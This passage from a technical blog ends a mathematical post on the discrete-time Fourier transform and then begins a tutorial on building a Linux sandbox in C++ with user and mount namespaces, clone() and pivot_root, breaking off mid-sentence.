\lambda_k e^{i \omega_k t}$ <p>We can push $\Delta_\omega$ inside the sum and add the index:</p> $\quad x_t = \frac{1}{2 \pi} \sum_{k = 0}^{N - 1} \lambda_k e^{i \omega_k t} \Delta_{\omega_k}$ <p>We can define $\lambda_k$ in terms of $\omega_k$ since $\vec{\lambda}$ is just a set of variables we’re defining and there’s a 1:1 mapping between $k$ and $\omega_k$, so we could just relabel $\lambda_k$ as $\lambda_{\omega_k}$. Let’s assume $\lambda$ is a function instead, so:</p> $\quad x_t = \frac{1}{2 \pi} \sum_{k = 0}^{N - 1} \lambda(\omega_k) e^{i \omega_k t} \Delta_{\omega_k}$ <p>Let’s also abstract $\lambda(\omega_k) e^{i \omega_k t}$ as a function of $\omega_k$, say, $f(\omega_k)$:</p> $\quad x_t = \frac{1}{2 \pi} \sum_{k = 0}^{N - 1} f(\omega_k) \Delta_{\omega_k}$ <p>This now looks like exactly as the format we wanted, observing that $\omega_k \in [\omega_{k+1}, \omega_k]$, $\omega_0 = 0$ and $\omega_{N-1} = 2 \pi$, we can express (4) as:</p> $x_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} f(\omega) d\omega$ <p>We can “unwrap” $f$ and get:</p> $(5) \quad x_t = \frac{1}{2 \pi} \int_{0}^{2 \pi} \lambda(\omega) e^{i \omega t} d\omega$ <p>We can define the inverse of (5) to obtain $\lambda(\omega)$:</p> $(6) \quad \lambda(\omega) = \sum_{t = 0}^{N-1} x_t e^{-i \omega t} \quad 0 \le \omega \le 2 \pi$ <p>Another note on notation: $\lambda(\omega)$ is often denoted as $X(e^{i\omega})$ in signal processing  to make it obvious it’s a periodic function .</p> <p>We can show that (6) is the <em>inverse transform</em> of (5).</p> <p><em>Proof:</em> We can verify this claim by replacing it in (5):</p> $\frac{1}{2 \pi} \int_{0}^{2 \pi} (\sum_{j = 0}^{N-1} x_j e^{-i \omega j}) e^{i \omega t} d\omega$ <p>Moving the second exponential into the sum and grouping them:</p> $\frac{1}{2 \pi} \int_{0}^{2 \pi} \sum_{j = 0}^{N-1} x_j e^{i \omega (t - j)} d\omega$ <p>We can also swap the sum and integral:</p> $\frac{1}{2 \pi} \sum_{j = 0}^{N-1} x_j \int_{0}^{2 \pi} e^{i \omega (t - j)} d\omega$ <p>Now if $t = j$, $\int_{0}^{2 \pi} e^{i \omega 0} = \int_{0}^{2 \pi} 1 = 2 \pi$. Otherwise, define $k = t - j$, $k \in \mathbb{Z}$. Then</p> $\int_{0}^{2 \pi} e^{i \omega k} d\omega = \frac{1}{i k} e^{i \omega k} \bigg\rvert_{0}^{2 \pi} = \frac{1}{i k} (e^{i 2 \pi k} - e^{0}) = 0$ <p>Since $e^{i 2 \pi k} = e^{0} = 1$, so the only index $j$ for which $e^{i \omega (t - j)}$ is non-zero is $j = t$, in which case it’s $2\pi$, which shows:</p> $\frac{1}{2 \pi} \int_{0}^{2 \pi} (\sum_{j = 0}^{N-1} x_j e^{-i \omega j}) e^{i \omega t} d\omega = x_t$ <p><em>QED</em></p> <h3 id="convergence">Convergence</h3> <p>For $\lambda(\omega)$ (6) to be defined, we need to show that its partial sums exist and are finite Let the $N$-th partial sum of (6) be $\lambda_N(\omega)$:</p> $\lambda_N(\omega) = \sum_{t = 0}^{N-1} x_t e^{-i \omega t}$ <p>If $\vec{x}$ is <strong>absolutely convergent</strong>, that is, there is $L$ such that</p> $\sum_{t=0}^{N} \abs{x_t} = L, \qquad N \rightarrow \infty$ <p>It’s possible to show that $\lambda_N(\omega)$ converges to $\lambda(\omega)$ uniformily, that is, for any arbitrary $\epsilon$,</p> $|\lambda_N(\omega) - \lambda(\omega)| &lt; \epsilon, \quad 0 \le \omega \le 2 \pi, N \rightarrow \infty$ <p>And that $\lambda(\omega)$ is continuous.</p> <p>On the other hand, if $\vec{x} \in \ell^2$ (i.e. it has finite energy), the above might not be the case. However it can be shown (the <a href="https://en.wikipedia.org/wiki/Riesz%E2%80%93Fischer_theorem">Riesz–Fischer theorem</a>) that $\lambda_N(\omega)$ converges in regards to the $L^2[0, 2 \pi]$ norm, that is:</p> $\int_{0}^{2 \pi} \norm{\lambda_N(\omega) - f(\omega)}^2 d\omega = 0$ <p>when $N \rightarrow \infty$.</p> <p>Another way to see this: if $\vec{x}$ is <em>absolutely convergent</em>, there’s a function that converges to $\lambda(\omega)$ exactly. If $\vec{x} \in \ell^2$, there’s a function that is not exactly like $\lambda(\omega)$, but is arbitrarily close when using $L^2[0, 2 \pi]$ to measure distance.</p> <h2 id="summary">Summary</h2> <p>One way to quickly differentiate between DFT, DFS abd DTFT is based on the types of signals they’re defined for:</p> <div class="center_children"> <table> <thead> <tr> <th>Transform</th> <th>Signal</th> </tr> </thead> <tbody> <tr> <td>DTF</td> <td>Finite</td> </tr> <tr> <td>DFS</td> <td>Infinite, periodic</td> </tr> <tr> <td>DTFT</td> <td>Infinite, aperiodic</td> </tr> </tbody> </table> </div> <h2 id="conclusion">Conclusion</h2> <p>In this post we butchered the notation from signal processing and handwaved rigour from the math side, so late apologies if this upset the reader.</p> <p>Also in this post, we got some mathematical intuition behind Fourier transforms. I’ve known the signal processing interpretation of the Fourier transform as the decomposition of periodic signals into pure sinusoids, but the mathematical approach also adds more formalism and helps understanding some constraints such as why we would want signals with finite energy.</p> <h2 id="related-posts">Related Posts</h2> <ul> <li><a href="https://www.kuniga.me/blog/2020/11/21/quantum-fourier-transform.html">Quantum Fourier Transform</a>. We ran into Fourier transforms befire in the context of Quantum computing. At that time I relied on the transform formula without further insights on its origin.</li> </ul> <h2 id="references">References</h2> <ul> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">1</a>] Signal Processing for Communications, Prandoni and Vetterli.</li> <li>[<a href="https://stackoverflow.com/questions/40894278/vertical-lines-to-points-in-scatter-plot">2</a>] Stack Overflow: Vertical lines to points in scatter plot</li> <li> A. Duncan, “The Analytic Impulse,” J. Audio Eng. Soc., vol. 36, no. 5, pp. 315-327, (1988 May)</li> <li>[<a href="https://en.wikipedia.org/wiki/Root_of_unity">4</a>] Wikpedia - Root of unity</li> <li>[<a href="https://en.wikipedia.org/wiki/Convergence_of_Fourier_series">5</a>] Wikpedia - Convergence of Fourier series</li> </ul>Guilherme KunigamiIn this post we’ll study three flavors of discrete Fourier transforms, the classic Discrete Fourier Transform but also Discrete Fourier Series and Discrete-Time Fourier Transform. We’ll focus on their mathematical rather than their physical interpretation and will come up with their formulas from linear algebra principles. Later we’ll also discuss the difference between each type of transform.Namespace Jailing2021-07-02T00:00:00+00:002021-07-02T00:00:00+00:00https://www.kuniga.me/blog/2021/07/02/namespace-jail<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>In a <a href="(https://www.kuniga.me/blog/2021/04/19/chroot-jail.html)">previous post</a> we investigated a jail system using chroot with the conclusion that it was not a safe implementation. In this post we’ll study a safer alternative using Linux namespaces. We’ll develop a C++ application along the way.</p> <!--more--> <h2 id="linux-namespaces">Linux Namespaces</h2> <p>The idea of Linux namespaces  is actually very close to that of a sandbox. We want to create subsystems within a system which are isolated, so if they’re tampered with, the hosting sytem is protected.</p> <p>Linux allows sandboxing different pieces of its system. For example the user namespace consists of a separate set of users and groups.</p> <p>There are at least 8 different namespaces available, but for the purposes of our simple sandbox, we’ll focus on 2: the user and mount namespaces.</p> <h2 id="setup">Setup</h2> <p>We’ll develop a C++ application to create a jailed process. The idea is to define a base class that does the heavy-lifting and exposes some paremeters that children functions can configure.</p> <p>The base class stub follows:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>and a sample child class:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="cp">#include "sub_process.cpp" </span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span> <span class="k">auto</span> <span class="n">process</span> <span class="o">=</span> <span class="n">ShellProcess</span><span class="p">();</span> <span class="k">return</span> <span class="n">process</span><span class="p">.</span><span class="n">run</span><span class="p">();</span> <span class="p">}</span></code></pre></figure> <p>We’ll assume the existence of some utils functions:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// utils.h</span> <span class="c1">// prints action to sterr + string representation of errno</span> <span class="kt">void</span> <span class="nf">error_action</span><span class="p">(</span><span class="n">string</span> <span class="n">action</span><span class="p">);</span> <span class="c1">// error_action + exit program with failure</span> <span class="kt">void</span> <span class="nf">fatal_action</span><span class="p">(</span><span class="n">string</span> <span class="n">action</span><span class="p">);</span> <span class="c1">// format string using printf() syntax</span> <span class="n">string</span> <span class="nf">format</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">format</span><span class="p">,</span> <span class="p">...);</span></code></pre></figure> <h2 id="cloning">Cloning</h2> <p>The <a href="https://man7.org/linux/man-pages/man2/clone.2.html"><code class="language-plaintext highlighter-rouge">clone()</code></a> function is a general version of <code class="language-plaintext highlighter-rouge">fork()</code> , which allows for more granular configuration. It can be used to start a new child process. It takes a few arguments:</p> <ul> <li>Pointer to a function <code class="language-plaintext highlighter-rouge">f</code></li> <li>Pointer to a stack</li> <li>Clone flags</li> <li>Pointer to object which will be passed to <code class="language-plaintext highlighter-rouge">f</code></li> </ul> <p>This function will create a child process and make it execute <code class="language-plaintext highlighter-rouge">f</code> with the provided arguments. The clone flags will determine what capabilities this child process will have, including what namespaces it will use. Let’s start with no flags for now.</p> <p>The parent process will receive the child <code class="language-plaintext highlighter-rouge">pid</code> from <code class="language-plaintext highlighter-rouge">clone()</code> and continue its execution.</p> <p>We’re mostly interested in <code class="language-plaintext highlighter-rouge">f</code> for now. Assume we have a function <code class="language-plaintext highlighter-rouge">allocate_stack()</code> that will allocate some memory for the stack available to the child process.</p> <p>We want the child process to call a function in <code class="language-plaintext highlighter-rouge">ShellProcess</code>, so we define an abstract function <code class="language-plaintext highlighter-rouge">child_function()</code> which the child class has to implement. We also add <code class="language-plaintext highlighter-rouge">child_function_wrapper()</code> so our base class can to execute some code when in the child process.</p> <p>We can’t pass non-static methods as function pointers, so we pass <code class="language-plaintext highlighter-rouge">this</code> as argument to the static function <code class="language-plaintext highlighter-rouge">child_function_with_this()</code>.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="k">virtual</span> <span class="kt">int</span> <span class="n">child_function</span><span class="p">()</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">static</span> <span class="kt">int</span> <span class="n">child_function_with_this</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="n">context</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="k">static_cast</span><span class="o">&lt;</span><span class="n">NamespaceProcess</span><span class="o">*&gt;</span><span class="p">(</span><span class="n">context</span><span class="p">)</span> <span class="o">-&gt;</span><span class="n">child_function_wrapper</span><span class="p">();</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">child_function_wrapper</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="n">child_function</span><span class="p">();</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">create_child</span><span class="p">(</span><span class="kt">int</span> <span class="n">clone_flags</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="o">*</span><span class="n">stack_top</span> <span class="o">=</span> <span class="n">allocate_stack</span><span class="p">();</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">clone</span><span class="p">(</span> <span class="o">&amp;</span><span class="n">NamespaceProcess</span><span class="o">::</span><span class="n">child_function_with_this</span><span class="p">,</span> <span class="n">stack_top</span><span class="p">,</span> <span class="n">clone_flags</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="k">this</span> <span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"Cloning"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">pid</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>The child class looks like:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">child_function</span><span class="p">()</span> <span class="p">{</span> <span class="n">cout</span> <span class="o">&lt;&lt;</span> <span class="s">"Hello World"</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>We should be able to compile and run this, but we might not see any results because the parent process ends before the child can run. We need some synchonization.</p> <h2 id="synchonization-i">Synchonization I</h2> <p>We want the parent process to wait for the child to finish. We can wait for the <code class="language-plaintext highlighter-rouge">SIGCHLD</code> signal, which the child will only emit if we pass the flag to <code class="language-plaintext highlighter-rouge">SIGCHLD</code> to <code class="language-plaintext highlighter-rouge">clone()</code> :</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">SIGCHLD</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// Wait for child to finish</span> <span class="kt">int</span> <span class="n">status</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="n">wait</span><span class="p">(</span><span class="o">&amp;</span><span class="n">status</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <h2 id="shell-process">Shell Process</h2> <p>Let’s use a better implementation for <code class="language-plaintext highlighter-rouge">ShellProcess</code> so we can try out commands in a jailed environment.</p> <p>In the example below we start a new shell, replacing the current child process. We customize it with a new <code class="language-plaintext highlighter-rouge">PS1</code> so it’s more obvious when we are inside the child process.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// main.cpp</span> <span class="k">class</span> <span class="nc">ShellProcess</span> <span class="o">:</span> <span class="k">public</span> <span class="n">NamespaceProcess</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">child_function</span><span class="p">()</span> <span class="p">{</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">env</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="s">"PS1=^_^: "</span><span class="p">,</span> <span class="nb">NULL</span> <span class="p">};</span> <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">execle</span><span class="p">(</span> <span class="s">"/bin/bash"</span><span class="p">,</span> <span class="s">"/bin/bash"</span><span class="p">,</span> <span class="s">"--norc"</span><span class="p">,</span> <span class="s">"-i"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">env</span> <span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"Failed to start shell"</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>We can try it out:</p> <figure class="highlight"><pre><code class="language-text" data-lang="text">$: g++ -std=c++17 main.cpp utils.cpp ./a.out ^_^: whoami kunigami ^_^: sudo su</code></pre></figure> <p>By default the child process has access to the same resources as the parent, include root access. We want to restrict that.</p> <h2 id="user-isolation">User Isolation</h2> <p>We’re ready for our first namespace, the user. We can simply do so by adding the <code class="language-plaintext highlighter-rouge">CLONE_NEWUSER</code> to the flags passed to <code class="language-plaintext highlighter-rouge">clone()</code>.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">SIGCHLD</span> <span class="o">|</span> <span class="n">CLONE_NEWUSER</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// ...</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>When we run:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">^_^: <span class="nb">whoami </span>nobody ^_^: <span class="nb">id </span><span class="nv">uid</span><span class="o">=</span>65534 <span class="nv">gid</span><span class="o">=</span>65534 <span class="nb">groups</span><span class="o">=</span>65534</code></pre></figure> <p>The user metadata starts blank and <code class="language-plaintext highlighter-rouge">65534</code> represents undefined. Let’s fix this.</p> <h2 id="mapping-user-ids">Mapping User IDs</h2> <p>We can create a mapping between IDs inside the namespace and outside . The map is stored in the file <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code>, where <code class="language-plaintext highlighter-rouge">&lt;pid&gt;</code> is the ID of the current process .</p> <p>So for example, if we have a process with PID 31378, we can inspect that file:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="o">&gt;</span> <span class="nb">cat</span> /proc/31378/uid_map 0 0 4294967295</code></pre></figure> <p>Each line represent one mapping. The meaning of each column is “ID_inside-ns”, “ID-outside-ns” and “length” . These three numbers represent 2 ranges of the same length, the first is <code class="language-plaintext highlighter-rouge">[ID_inside-ns, ID_inside-ns + length - 1]</code> and the second is <code class="language-plaintext highlighter-rouge">[ID_outside-ns, ID_outside-ns + length - 1]</code>, and ids in the first range map to ids in the second range.</p> <p>This is much easier to understand with an example, if we have a line with <code class="language-plaintext highlighter-rouge">10 1000 3</code>, it means the range of ids <code class="language-plaintext highlighter-rouge">[10, 11, 12]</code> in the current process maps to the parent process <code class="language-plaintext highlighter-rouge">[1000, 1001, 1002]</code>, thus <code class="language-plaintext highlighter-rouge">0 0 4294967295</code> (which is the default mapping) effectively represent a 1:1 mapping between every id.</p> <p>We can create a simple map so that the user ID 0 in the child maps to our current user running the parent:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="n">map</span><span class="o">&lt;</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="o">&gt;</span> <span class="n">get_uid_map</span><span class="p">()</span> <span class="p">{</span> <span class="n">map</span><span class="o">&lt;</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="o">&gt;</span> <span class="n">uid_map</span> <span class="o">=</span> <span class="p">{</span> <span class="p">{</span> <span class="mi">0</span><span class="p">,</span> <span class="n">getuid</span><span class="p">(),</span> <span class="p">}</span> <span class="p">};</span> <span class="k">return</span> <span class="n">uid_map</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Then we write to the file corresponding to a given pid:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="kt">int</span> <span class="nf">set_uid_map</span><span class="p">(</span><span class="n">map</span><span class="o">&lt;</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="o">&gt;</span> <span class="n">uid_map</span><span class="p">,</span> <span class="kt">int</span> <span class="n">pid</span><span class="p">)</span> <span class="p">{</span> <span class="n">string</span> <span class="n">uid_map_filename</span> <span class="o">=</span> <span class="n">format</span><span class="p">(</span><span class="s">"/proc/%d/uid_map"</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> <span class="n">ofstream</span> <span class="n">fs</span><span class="p">;</span> <span class="n">fs</span><span class="p">.</span><span class="n">open</span><span class="p">(</span><span class="n">uid_map_filename</span><span class="p">.</span><span class="n">c_str</span><span class="p">());</span> <span class="k">if</span> <span class="p">(</span><span class="n">fs</span><span class="p">.</span><span class="n">fail</span><span class="p">())</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"opening uid_map file"</span><span class="p">);</span> <span class="k">return</span> <span class="mi">1</span><span class="p">;</span> <span class="p">}</span> <span class="k">for</span> <span class="p">(</span><span class="k">auto</span> <span class="k">const</span><span class="o">&amp;</span> <span class="p">[</span><span class="n">in_id</span><span class="p">,</span> <span class="n">out_id</span><span class="p">]</span><span class="o">:</span> <span class="n">uid_map</span><span class="p">)</span> <span class="p">{</span> <span class="n">fs</span> <span class="o">&lt;&lt;</span> <span class="n">in_id</span> <span class="o">&lt;&lt;</span> <span class="s">" "</span> <span class="o">&lt;&lt;</span> <span class="n">out_id</span> <span class="o">&lt;&lt;</span> <span class="s">" "</span> <span class="o">&lt;&lt;</span> <span class="mi">1</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="p">}</span> <span class="n">fs</span><span class="p">.</span><span class="n">close</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>The tricky part is that the child process does not have privileges to write to its own <code class="language-plaintext highlighter-rouge">uid_map</code> file, so it’s the parent that has to do it. Let’s assume we have a function <code class="language-plaintext highlighter-rouge">before_child_runs()</code> that takes the child <code class="language-plaintext highlighter-rouge">pid</code> and as the name suggests runs before the child. This is where we set the uid map:</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="kt">int</span> <span class="nf">before_child_runs</span><span class="p">(</span><span class="kt">int</span> <span class="n">pid</span><span class="p">)</span> <span class="p">{</span> <span class="n">uid_map</span> <span class="o">=</span> <span class="n">get_uid_map</span><span class="p">();</span> <span class="n">set_uid_map</span><span class="p">(</span><span class="n">uid_map</span><span class="p">,</span> <span class="n">pid</span><span class="p">);</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>To guarantee the right order of execution, we’ll need more synchronization.</p> <h2 id="synchonization-ii">Synchonization II</h2> <p>We’ll use pipes for this as in . A pipe <code class="language-plaintext highlighter-rouge">pipe_fd</code> contains two file descriptors: <code class="language-plaintext highlighter-rouge">pipe_fd</code> is the <em>read</em> end of the pipe, and <code class="language-plaintext highlighter-rouge">pipe_fd</code> is the <em>write</em> end.</p> <p>When we clone a process the child inherits a copy of the open file descriptors, so pipes can be used as a IPC (inter-process communication) medium. We can also use it as a synchronization mechanism, because the <code class="language-plaintext highlighter-rouge">read()</code> function blocks until it receives the requested amount of data or the other side closes the file descriptor.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="nl">private:</span> <span class="kt">int</span> <span class="n">pipe_fd</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">child_function_wrapper</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// won't use</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="c1">// Block on parent - request a non-zero number of chars</span> <span class="kt">char</span> <span class="n">ch</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="n">read</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="o">&amp;</span><span class="n">ch</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">cerr</span> <span class="o">&lt;&lt;</span> <span class="s">"Failure in child: read from pipe returned != 0"</span> <span class="o">&lt;&lt;</span> <span class="n">endl</span><span class="p">;</span> <span class="p">}</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="c1">// ...</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="n">pipe</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">fatal_action</span><span class="p">(</span><span class="s">"open pipe"</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">get_custom_clone_flags</span><span class="p">()</span> <span class="o">|</span> <span class="n">SIGCHLD</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// won't use, but has to be closed after the child</span> <span class="c1">// was created</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span> <span class="n">before_child_runs</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span> <span class="c1">// Unblocks child</span> <span class="n">close</span><span class="p">(</span><span class="n">pipe_fd</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span> <span class="c1">// ...</span> <span class="p">}</span></code></pre></figure> <p>Now we can check the user is correct:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">^_^: <span class="nb">whoami </span>kunigami ^_^: <span class="nb">id </span><span class="nv">uid</span><span class="o">=</span>0 <span class="nv">gid</span><span class="o">=</span>65534 <span class="nb">groups</span><span class="o">=</span>65534</code></pre></figure> <p>Note that we have to do the same for the group id, which is a very similar process but we’ll skip for the sake of simplicity.</p> <h2 id="mount-isolation">Mount Isolation</h2> <p>Let’s also create a mount namespace by adding the <code class="language-plaintext highlighter-rouge">CLONE_NEWNS</code> flag.</p> <figure class="highlight"><pre><code class="language-cpp" data-lang="cpp"><span class="c1">// sub_process.cpp</span> <span class="k">struct</span> <span class="nc">NamespaceProcess</span> <span class="p">{</span> <span class="c1">// ...</span> <span class="kt">int</span> <span class="n">run</span><span class="p">()</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">clone_flags</span> <span class="o">=</span> <span class="n">SIGCHLD</span> <span class="o">|</span> <span class="n">CLONE_NEWUSER</span> <span class="o">|</span> <span class="n">CLONE_NEWNS</span><span class="p">;</span> <span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">create_child</span><span class="p">(</span><span class="n">clone_flags</span><span class="p">);</span> <span class="c1">// ...</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p>Differently from the user namespace which starts everything empty, the mount namespace starts with a copy of the host’s mount system, but we want to restrict that. We’ll define a new root for our filesystem and mount only a selected few paths on it, using <code class="language-plaintext highlighter-rouge">pivot_root()</code>.</p> <p>This is the most complicated part of the code, so let’s go over the high-level steps.</p> <ul> <li>Make the current root (<code class="language-plaintext highlighter-rouge">/</code>) a private mount point (it’s shared by default). This <a href="https://lwn.net/Articles/689856/">article</a> goes over the different types of mount points. From :</li> </ul> <blockquote> <p>These restrictions ensure that <code class="language-plaintext highlighter-rouge">pivot_root()</code> never propagates any changes to another mount namespace.</p> </blockquote> <ul> <li>Make sure the new root is a mount point. From :</li> </ul> <blockquote> <p><code class="language-plaintext highlighter-rouge">new_root</code> must be a path to a mount point, but can’t be “/”. A path that is not already a mount point can be converted into one by bind mounting the path onto itself</p> </blockquote> <ul> <li>Mount a selection of paths <code class="language-plaintext highlighter-rouge">P</code> (provided by the child class) onto the new root</li> <li>Create a temporary directory <code class="language-plaintext highlighter-rouge">put_old</code> (under the new root), where the old root will be temporarily stored. From :</li> </ul> <blockquote> <p><code class="language-plaintext highlighter-rouge">put_old</code> must be at or underneath <code class="language-plaintext highlighter-rouge">new_root</code></p> </blockquote> <ul> <li>Pivot root - This makes <code class="language-plaintext highlighter-rouge">new_root</code> the new root and it mounts the old root onto <code class="language-plaintext highlighter-rouge">put_old</code></li> <li>Re-mount the paths <code class="language-plaintext highlighter-rouge">P</code> - It seems that <code class="language-plaintext highlighter-rouge">pivot_root()</code> unmounts prior mounts so we have to remount. I don’t actually understand why we need to mount twice, but it only works if I do this, and this is also what <a href="https://github.com/google/nsjail">nsjail</a> does .</li> <li>Unmount the old root</li> </ul> <p>Most of these steps are described as an example in the man page of <a href="https://man7.org/linux/man-pages/man2/pivot_root.2.html"><code class="language-plaintext highlighter-rouge">pivot_root()</code></a> .</p> <p>In 